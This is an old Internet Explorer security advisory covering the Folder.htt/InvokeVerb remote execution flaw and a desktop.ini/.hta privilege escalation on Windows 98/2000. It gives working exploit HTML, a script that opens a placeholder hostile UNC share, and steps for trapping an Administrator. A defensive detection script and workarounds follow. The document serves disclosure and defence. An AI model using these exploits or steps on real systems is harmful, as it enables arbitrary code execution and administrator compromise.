COMMAND
IE
SYSTEMS AFFECTED
Win systems
PROBLEM
Georgi Guninski found the following (Security Advisory #18). IE
5.5/5.x for Win98 may execute arbitrary files that can be accessed
through Microsoft Networking. There is also a local Administrator
compromise, at least on a default Windows 2000 installation.
Systems affected are:
- For remote file execution: IE 5.5, 5.x/Windows 98; the files must
be accessible through Microsoft Networking.
- For local Administrator compromise on Windows 2000: default
Windows 2000 installation, tested with IE 5.5 as well.
This advisory contains two issues, but since they use a common
ActiveX control and concept, Georgi decided to post them in one
advisory.
I) IE 5.x may execute arbitrary programs when visiting a web page,
reading HTML based mail with Outlook or simply browsing folders
(that may be remote) as web pages (which is the default
configuration for Windows).
II) Local Administrator compromise on a default installation of
Windows 2000. Not tested with IE 5.5 installed, but believed to
work. In order to be compromised, the Administrator must open a
local folder as a web page (which is the default option when
browsing folders). In both cases a malicious person may take full
control over the user's computer/server.
Browsing web sites and reading HTML mail may be dangerous, but it
turns out that browsing local or remote folders is also dangerous.
The exploits use a feature of Windows 98/2000 that allows viewing
folders as web pages due to the integration of IE in the operating
system.
This allows active content to run when browsing a local or remote
folder, which turns out to be dangerous. The way the folder looks
when viewed as a web page is controlled by a file, Folder.htt,
located in the folder, which is a special HTML file that may
contain Active Scripting and ActiveX Objects. If you want to view
the files in the folder, you must use an ActiveX Control - Shell
DefView, which basically contains the functionality of the old
Explorer.
The Shell DefView Control has an interesting method - InvokeVerb,
which is used to perform actions on the currently selected file
- for example showing its properties and, the most interesting
part, opening/executing it.
It has a string parameter - the action to perform on a file or
folder. Microsoft has tried to secure it - it yields a security
error if you pass an argument to it, and that is reasonable. But
amazingly, if you just call InvokeVerb() with no parameters, it
executes the default action on the file/folder, and that action is
Open (Execute).
So, to exploit this we create a folder and place a malicious file
that we want to execute - for example "a.bat". Also in that
folder, we put the active file Folder.htt.
The code of Folder.htt:
<html>
<body>
<script>
setTimeout("f()",2000);
function f() {
FileList.focus();
FileList.FocusedItem.InvokeVerb();
}
</script>
<H1>Hello World<BR>Written by Georgi Guninski</H1>
<object id=FileList border=0 tabindex=1
classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2">
</object>
</body>
</html>
So what does the code do? FileList.focus() focuses the first file
in our folder - in our example a.bat. Note: a.bat may not be the
first file in our folder; this depends on the arrangement of the
icons in the folder (the default is by name). But to circumvent this
we may put additional files with different names/dates/extensions
so that, whatever the arrangement is, our target file is first in
the list. FileList.FocusedItem.InvokeVerb() does the real job - it
opens (executes) the focused file. So we create a customized
folder with malicious content, place it somewhere, probably remote,
and wait for or force a victim to open it. ac.zip for demonstration
is available at:
http://www.nat.bg/~joro/ac.zip
Here is the zip file in MIMEd form:
For I) IE 5.x may execute arbitrary files when visiting a web
page, reading HTML based mail with Outlook or simply browsing
folders (that may be remote) as web pages (which is the default
configuration for Windows). To test it remotely with Windows 98:
Unzip ac.zip in a UNC share for example: \\HOSTILEUNCORIP\SHARE
Browse \\HOSTILEUNCORIP\SHARE as a web page from IE.
Or open a web page containing:
<SCRIPT>
window.open("\\\\HOSTILEUNCORIP\\SHARE");
</SCRIPT>
Note: Sometimes the remote test does not work the first time.
Try again (browse the folder again or reload the web page) if it
does not work the first time.
For II) Local Administrator compromise on a default installation of
Windows 2000. Not tested with IE 5.5 installed, but believed to
work. In order to be compromised, the Administrator must open a
local folder as a web page (which is the default option when
browsing folders). A local user may create a customized folder,
and if the Administrator opens it as a web page (which is the
default) then the Administrator account is compromised. It is
amazing that when the Administrator opens the folder a security
warning "...may be unsafe...Do you want to allow it to be
initialized and accessed by scripts?" with "Yes/No" buttons
appears. Whatever button you choose, the content is executed. This
is funny!
As an ordinary user, unzip ac.zip in any folder, for example ac.
1) Open ac from My Computer
2) Select View->Customize this Folder->Next->Customize->Choose
or edit...->Next
3) Select Choose a template->Current->Next->Finish
Wait for the Administrator to open the folder as a web page.
Greg Anuzelli added the following. This is an issue that he had
submitted to Microsoft. He was going to wait to hear from them
before making it public, but changed his mind when, only several
hours later, he saw Georgi Guninski's Customized Folders issue.
He found a problem with the way that Explorer handles Custom
Folders that could be used to execute arbitrary commands under the
security context of an unknowing user.
If you use Web View and customize a folder, a desktop.ini and a
"Folder Settings" folder are created. The desktop.ini
"PersistMoniker" line specifies the .htt file to use to create
the view. This view is rendered in the "Local Intranet" zone, so
only controls marked "Safe for scripting" can be used. The
problem is that you can tell desktop.ini to use an .hta file
instead, which does not operate in a security sandbox. The
desktop.ini file inherits the same ACL as the directory, so a
user that has write access to a folder will also have write access
to desktop.ini.
Here's one obvious example of how this vulnerability can be
exploited: A popular share exists on a file server. Joe User (a
Domain User) has change access to this share. He customizes the
folder and creates a .hta that tries to add him or her to the
Domain Admins group (via NET USER or ADSI, whatever). He or she
modifies the desktop.ini to point to the .hta and waits for a Domain
Admin (with Web View enabled) to browse to the share. A problem
with this exploit is that the window that is supposed to display
the contents of the share does not get updated, but if you wanted
to you could write code to update the window properly just like
the original folder.htt does.
Greg tested this on Windows 2000 Server & Pro with and without
SP1, on IE 5.0 & 5.5, and with all the latest security patches.
There may be other "bad" extensions other than .hta that work,
but he tried .cmd, .bat, and .wsf without success.
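As an added defensive check (not part of Guninski's or Anuzelli's material), the following Python script scans a folder tree for the two indicators described above: a desktop.ini whose PersistMoniker points at anything other than an .htt template, and a view template that embeds the Shell DefView control and calls InvokeVerb() with no arguments. The sample desktop.ini and template are constructed here, and the desktop.ini section layout is a simplified assumption; only the Shell DefView CLSID comes from the advisory.

```python
import os
import re
import tempfile

# Shell DefView control CLSID, as quoted in the advisory's Folder.htt.
DEFVIEW_CLSID = "1820FED0-473E-11D0-A96C-00C04FD705A2"
INVOKE_VERB_NOARGS = re.compile(r"InvokeVerb\s*\(\s*\)", re.I)
PERSIST_MONIKER = re.compile(r"^\s*PersistMoniker\s*=\s*(.+?)\s*$", re.I | re.M)
# Constructed samples (not the advisory's ac.zip); the desktop.ini section layout is simplified.
SAMPLE_DESKTOP_INI = "[ExtShellFolderViews]\nPersistMoniker=file://Folder Settings\\run.hta\n"
SAMPLE_FOLDER_HTT = ('<script>function f(){FileList.focus();FileList.FocusedItem.InvokeVerb();}'
                     '</script><object id=FileList classid="clsid:%s"></object>' % DEFVIEW_CLSID)

def check_desktop_ini(text):
    """Flag PersistMoniker entries that point anywhere but an .htt template."""
    return ["PersistMoniker points at non-.htt view: " + t for t in PERSIST_MONIKER.findall(text)
            if os.path.splitext(t)[1].lower() != ".htt"]

def check_template(text):
    """Flag a view template that embeds Shell DefView and/or calls InvokeVerb()."""
    hits = [("embeds Shell DefView control", DEFVIEW_CLSID.lower() in text.lower()),
            ("calls InvokeVerb() with no arguments, i.e. the default Open verb",
             bool(INVOKE_VERB_NOARGS.search(text)))]
    return [msg for msg, hit in hits if hit]

def scan_folder(root):
    """Walk a tree; return {relative path: findings} for desktop.ini, .htt and .hta files."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            is_ini = name.lower() == "desktop.ini"
            if not is_ini and not name.lower().endswith((".htt", ".hta")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                found = (check_desktop_ini if is_ini else check_template)(fh.read())
            if found:
                report[os.path.relpath(path, root)] = found
    return report

def demo():
    """Lay the samples out like a customized share folder in a temp dir, then scan it."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "Folder Settings"))
    for rel, body in (("desktop.ini", SAMPLE_DESKTOP_INI),
                      (os.path.join("Folder Settings", "Folder.htt"), SAMPLE_FOLDER_HTT)):
        with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
            fh.write(body)
    return scan_folder(root)
```

Run scan_folder() against the root of a share to list every customized folder whose view template or desktop.ini carries these indicators; a PersistMoniker that still points at an .htt file, and a template without DefView or InvokeVerb(), produce no findings.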
SOLUTION
Do not browse folders as web pages. The remote attack may be
stopped by a firewall that blocks Microsoft Networking, and you are
encouraged to configure your firewall that way. But application
holes must be fixed at the application level and not rely on
firewall behavior!
Further, possible workarounds involve removing the MODIFY
permissions from Power Users on all .HTT's on your systems
(thereby limiting the possible exploit to Administrators).